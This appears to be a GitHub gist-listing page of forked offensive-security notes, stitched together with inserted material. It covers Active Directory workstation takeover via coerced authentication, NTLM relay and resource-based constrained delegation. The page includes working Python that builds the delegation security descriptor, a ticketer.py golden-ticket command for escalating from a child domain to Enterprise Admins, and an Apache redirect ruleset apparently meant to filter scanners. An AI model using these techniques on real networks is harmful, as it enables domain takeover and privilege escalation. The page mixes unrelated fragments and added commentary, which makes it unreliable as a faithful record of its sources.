@TAI-REx
TAI-REx / tmux-cheatsheet.markdown
Created July 23, 2022 04:53 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@TAI-REx
TAI-REx / Workstation-Takeover.md
Created June 12, 2022 02:42 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11), and possibly servers (if Desktop Experience is installed), when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of domain credentials for the RPC call, and it only yields HTTP authentication when the target's WebClient (WebDAV redirector) service is running, since the plain SMB client will not authenticate to an HTTP path.
  • Relaying that machine authentication to LDAPS to configure RBCD, i.e. writing msDS-AllowedToActOnBehalfOfOtherIdentity on the target's computer object so that an attacker-controlled account may delegate to it.
  • RBCD takeover: from the account that was granted delegation, request a service ticket for the target (S4U2Self/S4U2Proxy) impersonating a privileged user and log in with it.

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
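The second step is the one that actually grants the foothold: the relay writes a security descriptor containing an ACE for the attacker-controlled account's SID into the target computer object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The pure-Python builder/decoder below is an example added here, not code from the gist or from impacket; it shows byte for byte what that self-relative descriptor contains, and how to append a SID to a descriptor that already exists instead of clobbering delegation entries the target already had. The SIDs are constructed test values; the 0xF01FF mask is the full-control mask that ntlmrelayx --delegate-access writes, and BUILTIN\Administrators is used as owner/group as that tool does.

```python
"""Build and decode the msDS-AllowedToActOnBehalfOfOtherIdentity security
descriptor used for RBCD (self-relative SECURITY_DESCRIPTOR, MS-DTYP layout).
Added example; uses only the standard library."""
import struct

SD_REVISION = 1
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF           # mask written by ntlmrelayx --delegate-access
BUILTIN_ADMINS = "S-1-5-32-544"     # owner and group of the descriptor


def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' into the binary SID structure."""
    parts = sid.split("-")
    assert parts[0] == "S", "not a SID string"
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    out = struct.pack("<BB", revision, len(subs))
    out += authority.to_bytes(6, "big")          # IdentifierAuthority is big-endian
    out += b"".join(struct.pack("<I", s) for s in subs)
    return out


def bytes_to_sid(buf, off=0):
    """Decode a binary SID at buf[off:]; returns (sid_string, byte_length)."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    sid = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return sid, 8 + 4 * count


def build_rbcd_sd(allowed_sids):
    """Self-relative SD whose DACL grants FULL_CONTROL to each SID.
    Stored on TARGET$, it lets each listed principal delegate to TARGET$."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        ace_size = 8 + len(sid_b)                  # ACE header is 8 bytes
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    group = owner
    off_owner = 20                                 # header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack("<BBHIIII", SD_REVISION, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # no SACL
    return header + owner + group + acl


def parse_rbcd_sd(blob):
    """Return [(sid, mask), ...] for every ACCESS_ALLOWED ACE in the DACL."""
    if len(blob) < 20:
        return []
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if revision != SD_REVISION or not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, off_dacl)
    pos = off_dacl + 8
    allowed = []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(blob, pos + 8)
            allowed.append((sid, mask))
        pos += ace_size                            # skip unknown ACE types safely
    return allowed


def add_rbcd_sid(existing_blob, new_sid):
    """Append new_sid to an existing descriptor rather than overwriting it,
    so principals that were already allowed to delegate keep working."""
    current = [sid for sid, _ in parse_rbcd_sd(existing_blob)] if existing_blob else []
    if new_sid not in current:
        current.append(new_sid)
    return build_rbcd_sd(current)


if __name__ == "__main__":
    # Constructed SID for a hypothetical attacker-created machine account.
    sd = build_rbcd_sd(["S-1-5-21-1111-2222-3333-1105"])
    print(sd.hex())
    print(parse_rbcd_sd(sd))
```

After the relay, read the attribute back with an LDAP search and feed the raw bytes to parse_rbcd_sd to confirm only the intended SID is listed; on cleanup, clear the attribute entirely rather than leaving a rebuilt descriptor behind.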

Golden Tickets to hop domains:

Requirements:

  • krbtgt NT hash of the child domain (secretsdump)
  • SID of the child domain and SID of the Enterprise Admins group in the parent domain (ldapdomaindump/bloodhound); Enterprise Admins is RID 519 of the parent domain

ticketer.py -nthash [KRBTGT NT HASH FOR CHILD.PARENT.LOCAL] -domain-sid [SID FOR CHILD.PARENT.LOCAL] -domain CHILD.PARENT.LOCAL -extra-sid [SID OF ENTERPRISE ADMINS IN PARENT.LOCAL] [USERNAME IN CHILD.PARENT.LOCAL]
@TAI-REx
TAI-REx / AD-OSCP.md
Created April 29, 2022 20:58 — forked from RajChowdhury240/AD-OSCP.md
Active Directory Attacks OSCP

A small collection of specialised scripts for Active Directory.

Includes:

  • Compare-ADMemberOf
  • Get-ADSystemInfo
  • Get-GroupMemberTree
  • Get-LdapObject
  • Get-MemberOfTree
  • Test-LdapSslConnection
@TAI-REx
TAI-REx / 8x1080.md
Created October 3, 2021 22:16 — forked from epixoip/8x1080.md
8x Nvidia GTX 1080 Hashcat Benchmarks
@TAI-REx
TAI-REx / .htaccess
Created May 19, 2021 00:18 — forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
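To show how the Include wiring fits together, here is a hypothetical redirect.rules written for this page (an added example, not curi0usJack's ruleset, whose actual match conditions are not shown here). It defines DESTINATIONURL once, so the RewriteRule substitution never needs editing, and bounces any request whose User-Agent matches a placeholder scanner-like pattern:

```apache
# /etc/apache2/redirect.rules  (hypothetical example; requires Apache 2.4+ and mod_rewrite)
# Set the bare host, without http(s)://, exactly as the TO-DO above says.
Define DESTINATIONURL www.example.com

RewriteEngine On
# Placeholder condition: the real file decides what "matching requests" are.
RewriteCond %{HTTP_USER_AGENT} "curl|python-requests|wget" [NC]
# Preserve the original path so the bounce looks like an ordinary redirect.
RewriteRule ^.*$ http://${DESTINATIONURL}%{REQUEST_URI} [L,R=302]
```

Enable the module with `a2enmod rewrite`, add `Include /etc/apache2/redirect.rules` near the bottom of the vhost as described above, then run `apachectl configtest` before reloading; a `Define` placed in an included file is visible to the rest of the vhost, so pick a name that does not collide with other variables.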
Hack Back!
A DIY Guide